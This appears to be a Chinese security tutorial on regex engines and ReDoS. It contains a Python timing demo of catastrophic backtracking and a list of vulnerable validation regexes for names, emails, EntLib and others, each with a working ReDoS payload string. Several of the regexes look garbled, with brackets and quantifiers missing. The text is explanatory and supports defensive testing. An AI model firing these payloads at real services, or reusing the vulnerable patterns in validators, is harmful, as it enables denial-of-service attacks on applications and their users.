一、正则表达式引擎
1.DFA:速度快、特性少,(mysql)
2.NFA:速度慢、特性多,(大多数语言:python、java、php、ruby、.net、perl)
引擎 | 区别 | 语言 | 匹配方式 |
---|---|---|---|
DFA | 速度快、特性少 | mysql等 | 拿文本去比较正则 |
NFA | 速度慢、特性多 | python、java、php、ruby、.net、perl等 | 拿正则去比较文本 |
二、NFA的匹配流程与回溯
2.1匹配流程
reg:"lingwu"
text:"this is lingwu's blog"
以reg的“lingwu”为基准,从“l”开始和text文本进行匹配,一直到第8个字符“l”时才匹配成功,接着用第二个字符“i”进行匹配,以此类推,直到最后一个字符“u”。
2.2回溯
reg:"lingwu2"
text:"this is lingwu's blog"
前面过程不变,当reg用最后一个字符“2”和文本进行匹配的时候,由于text中lingwu后面没有匹配到2,此时发生回溯。重新用reg中第一个字符“l”与text中第9个字符“i”进行匹配,后面流程与之前一样。
可通过正则在线debug进行查看匹配过程 https://regex101.com
三、ReDos
以正则为”^(a+)+$”,文本为”aaaaaax”为例,发现随着a的数量增加,正则执行的步骤越来越多,所需的时间也越来越多。
#!/usr/bin/env python
import re
import time
import sys
regex = r"^(a+)+$"
maketeststring = lambda n: "a" * n +"X"
maxiter = 50
maxtime = 2
# Main function
def main():
print "Python Regular Expression DoS demo"
print "Platfrom: %s %s" % (sys.platform, sys.version)
print "Regular expression %s" % (regex)
print "Typical test string: %s" % (maketeststring(10))
print "Max. itertations: %d" % (maxiter)
print "Max. match time: %d sec%s" % (maxtime, "s" if maxtime != 1 else "")
print
cregex = re.compile(regex)
for i in xrange(1, maxiter):
time = runtest(cregex, i)
if time > maxtime:
break
return
# Run one test
def runtest(regex, n):
teststr = maketeststring(n)
starttime = time.clock()
match = regex.match(teststr)
elapsetime = int((time.clock() - starttime) * 1000)
count = 0
if match != None:
count = match.end - match.start
print "For n = %d, match time = %d msec%s, match count = %s" % (n, elapsetime, "s" if elapsetime == 1 else "", count)
return float(elapsetime) / 1000
if __name__ == "__main__":
main()
执行结果如下:
For n = 20, match time = 60 msec, match count = 0
For n = 21, match time = 113 msec, match count = 0
For n = 22, match time = 240 msec, match count = 0
For n = 23, match time = 481 msec, match count = 0
For n = 24, match time = 995 msec, match count = 0
For n = 25, match time = 1944 msec, match count = 0
For n = 26, match time = 3853 msec, match count = 0
以下为存在问题的正则:
- 英文的个人名字:
- Regex: ^[a-zA-Z]+(([',.-][a-zA-Z ])?[a-zA-Z])$
- Payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaa!
- Java Classname
- Regex: ^(([a-z])+.)+A-Z+$
- Payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
- Email格式验证
- Regex: ^(0-9a-zA-Z@(([0-9a-zA-Z])+([-\w][0-9a-zA-Z])*.)+[a-zA-Z]{2,9})$
- Payload: a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
- 多个邮箱地址验证
- Regex: ^[a-zA-Z]+(([',.-][a-zA-Z ])?[a-zA-Z])\s+<(\w[-._\w]\w@\w[-._\w]\w.\w{2,3})>$|^(\w[-._\w]\w@\w[-._\w]\w.\w{2,3})$
- Payload: aaaaaaaaaaaaaaaaaaaaaaaa!
- 复数验证
- Regex: ^\d[0-9](|.\d[0-9]|)*$
- Payload: 1111111111111111111111111!
- 模式匹配
- Regex: ^([a-z0-9]+([-a-z0-9][a-z0-9]+)?.){0,}([a-z0-9]+([-a-z0-9][a-z0-9]+)?){1,63}(.[a-z0-9]{2,7})+$
- Payload: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
- DataVault:
- Regex: ^[(,.)]$
- Payload: [,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
- WinFormsAdvanced:
- Regex: \A([A-Z,a-z]\s?[0-9][A-Z,a-z])\Z
- Payload: aaaaaaaaaaaaaaaaaa!
- EntLib:
- Regex: ^([^"]+)(?:\([^"]+))*$
- Payload: \\\\\\\\\\\\\\\\“
发现有以下规律:
- 使用重复分组构造
- 在重复组内会出现
- 重复
- 交替重叠
简单表达出来为下几种情况:
(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+
(.*a){x} for x > 10
四、工具篇
微软早些发步了一个regex fuzzer的工具,极大的方便了安全人员的测试。用起来也很简单: